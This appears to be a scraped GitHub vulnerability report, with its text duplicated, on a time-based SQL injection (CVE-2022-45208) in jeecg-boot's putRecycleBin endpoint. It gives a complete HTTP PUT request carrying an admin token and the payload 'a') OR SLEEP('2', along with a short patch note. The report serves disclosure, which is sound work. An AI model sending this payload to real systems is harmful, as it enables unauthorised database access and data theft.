revertLogicDeleted. You can see that no precompiling is performed
SysUserController.java
SysUserServiceImpl.java
So Users can pass in malicious parameters through http requests to achieve SQL injection
poc
The website will return immediately when the following content is passed in
After the following content is passed in, the website will return after a delay of 2 seconds
vuln
attack can user this to get data from database
payload:
PUT /jeecg-boot/sys/user/putRecycleBin HTTP/1.1
Host: 192.168.1.1:8088
Content-Length: 34
Request-Origion: Knife4j
Accept: /
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.1.1:8088
Referer: http://192.168.1.1:8088/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
{
"userIds": "a') OR SLEEP('2"
}
patch
In (${})
It seems that this cannot be modified to precompile
So it is recommended to add some keywords such as')
The text was updated successfully, but these errors were encountered:
/sys/user/deleteRecycleBin is affected by sql injection #4125
azraelxuemo
changed the title
/sys/user/putRecycleBin is affected by sql injection
[CVE-2022-45208]/sys/user/putRecycleBin is affected by sql injection
Dec 7, 2022
XKC1025
pushed a commit
to XKC1025/jeecg-boot
that referenced
this issue
Mar 13, 2023
sysUserMapper.xml
revertLogicDeleted. You can see that no precompiling is performed

SysUserController.java
SysUserServiceImpl.java

So Users can pass in malicious parameters through http requests to achieve SQL injectionpoc
The website will return immediately when the following content is passed in


After the following content is passed in, the website will return after a delay of 2 seconds
vuln
attack can user this to get data from database
payload:
PUT /jeecg-boot/sys/user/putRecycleBin HTTP/1.1
Host: 192.168.1.1:8088
Content-Length: 34
Request-Origion: Knife4j
Accept: /
knife4j-gateway-code: ROOT
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NjY2NjgzNjYsInVzZXJuYW1lIjoiYWRtaW4ifQ.WUx3LR8rvOp92_GueiJtlqtjV4tDRnOZos_-IAp34nA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Content-Type: application/json
Origin: http://192.168.1.1:8088
Referer: http://192.168.1.1:8088/jeecg-boot/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
{
"userIds": "a') OR SLEEP('2"
}
patch
In (${})
It seems that this cannot be modified to precompile
So it is recommended to add some keywords such as')
The text was updated successfully, but these errors were encountered: